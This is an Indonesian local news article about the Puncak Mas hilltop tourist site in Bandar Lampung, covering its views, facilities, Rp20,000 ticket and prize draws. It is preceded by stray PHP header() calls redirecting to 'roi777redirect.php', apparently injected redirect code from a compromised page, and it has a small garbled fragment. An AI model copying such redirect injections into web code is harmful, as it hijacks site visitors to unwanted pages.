header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Puncak Mas Tawarkan Keindahan Alam dari Ketinggian 403 Meter -
Puncak Mas Tawarkan Keindahan Alam dari Ketinggian 403 Meter

Dengan harga murah, Banyak keuntungan yang didapat jika berkunjung ke Puncak Mas. Pemandangan yang indah dengan udara yang segar adalah tempat wisata yang paling diminati masyarakat untuk mengisi liburan apalagi dengan fasilitas background foto yang indah. Tempat wisata ini dapat dinikmati di Puncak Mas yang berada di kecamatan Suka Danaham, Kemiling, Bandarlampung dengan ketinggian 403 Meter.

LAPORAN: MG6/BANDARLAMPUNG

ranslaTmpung-Pemilik Puncak Mas Thomas A. Riska mengatakan, Puncak Mas ini punya banyak keunikan seperti Mushola pohon, Rumah Pohon hingga Pondokan dengan tiga pemandangan sekaligus laut, perkotaan dan pegunungan.

“Kita juga punya slogan “Belum Keren ke Lampung kalo belum ke Puncak Mas,” ujar dia.

Untuk menikmati keindahan di Puncak Mas, Pengunjung hanya dibandrol dengan harga yang terjangkau hanya Rp20 ribu.

Dia menambahkan, dengan membayar tiket masuk sudah termasuk gratis Wifi, Parkir, WC, rumah pohon, dan pondokan.

“Jadi banyak sekali fasilitas yang dapat kita nikmati disana. Disini kita juga mengadakan undian setiap minggu dari tiket tersebut dan juga undian foto yang di unggah di media sosial instagram dengan menandai akun official Puncak Mas yaitu @puncakmasofficial. Hadiah yang kita berikan seperti kulkas, tv, sepeda, tiket gratis dan masih banyak lagi,” ujar dia.

Thomas menambahkan, disini selain wisata alam juga dapat berwisata rohani dengan adanya musholla pohon yang bertujuan agar pengunjung yang beribadah dapat lebih khusuk dan juga merasakan sensasi yang berbeda.

Tempat wisata yang dapat dibilang masih baru karena baru soft opening pada 1 Januari 2017, sudah memiliki pengunjung yang banyak terlebih dihari libur.

Thomas melanjutkan, perkiraan di bukan Juli Puncak Mas akan mengadakan Grand Opening dengan banyak fasilitas yang terbaru.

Ditambahkan pula oleh Humas Puncak Mas Novi, Puncak Mas akan selalu membuat inovasi terbaru agar pengunjung tidak bosan dan selalu penasaran dengan pembaruan yang dibuat.

Thomas berharap pengunjung makin banyak dan Puncak Mas makin kece dan menjadi tujuan berlibur dan bersantai untuk masyarakat Lampung dan luar Lampung.(*)

News Reporter